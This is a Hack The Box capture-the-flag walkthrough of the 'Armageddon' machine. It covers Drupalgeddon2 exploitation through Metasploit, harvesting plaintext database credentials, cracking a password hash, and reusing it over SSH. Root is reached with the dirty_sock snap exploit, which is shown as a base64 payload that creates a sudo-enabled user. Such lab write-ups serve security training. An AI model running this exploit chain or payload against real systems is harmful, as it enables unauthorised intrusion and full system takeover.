Hack The Box - Armageddon
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap 10.10.10.233
Let's check if we can work our way around the login page!
Exploring further, I found that the site runs Drupal 7, which can be exploited with Metasploit's Drupalgeddon2 module when the Drupal core is left unpatched!
┌──(root💀kali)-[/home/kali/Downloads]
└─# msfconsole
msf6 > search drupal
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.35
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit
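cat settings.php
Drupal keeps its database credentials in plaintext in this file, so anyone who can read it gets database access:
'username' => 'drupaluser',
'password' => 'CQHEy@9M*m23gBVj',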
mysql -u drupaluser -p -e 'show databases;'
mysql -u drupaluser -p -D 'drupal' -e 'show tables;'
mysql -u drupaluser -p -D 'drupal' -e 'select * from users;'
Output:
brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt
┌──(root💀kali)-[/home/kali/Downloads]
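└─# john hash --wordlist=rockyou.txt
Output: booboo (the cracked password for brucetherealadmin; because it appears in rockyou.txt, it falls to a dictionary attack no matter how it is hashed)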
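The password cracked from the Drupal users table is also accepted for the brucetherealadmin system account over SSH:
┌──(root💀kali)-[/home/kali/Downloads]
└─# ssh brucetherealadmin@10.10.10.233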
User.txt: ae611d2c546da871XXXXXXXXXXXXXX
[brucetherealadmin@armageddon ~]$ python --version
https://github.com/initstring/dirty_sock/blob/master/dirty_sockv2.py
https://gitlab.com/tamilcode/dirty-sock-exploit/-/blob/main/dirty_sock_exploit
[brucetherealadmin@armageddon /]$ cd tmp[brucetherealadmin@armageddon tmp]$ python2 -c ‘print “aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw” + “A”*4256 + “==”‘ | base64 -d > dedsec.sna
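brucetherealadmin is apparently allowed to run /usr/bin/snap install through sudo; a snap's install hook executes as root, so such a sudo rule is equivalent to granting full root access:
[brucetherealadmin@armageddon tmp]$ sudo /usr/bin/snap install --devmode dedsec.snap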
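[brucetherealadmin@armageddon tmp]$ cat /etc/passwd
The install adds a new local account with sudo rights; an unexpected entry in /etc/passwd or /etc/sudoers is the artifact a defender would look for:
Username: dirty_sock
Password: dirty_sock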
[brucetherealadmin@armageddon tmp]$ su dirty_sock
[dirty_sock@armageddon tmp]$ sudo -i
[root@armageddon ~]# cd /root
[root@armageddon ~]# cat root.txt
Root.txt: 7e815792cbddaf2XXXXXXXXXXXXXXXXXXXX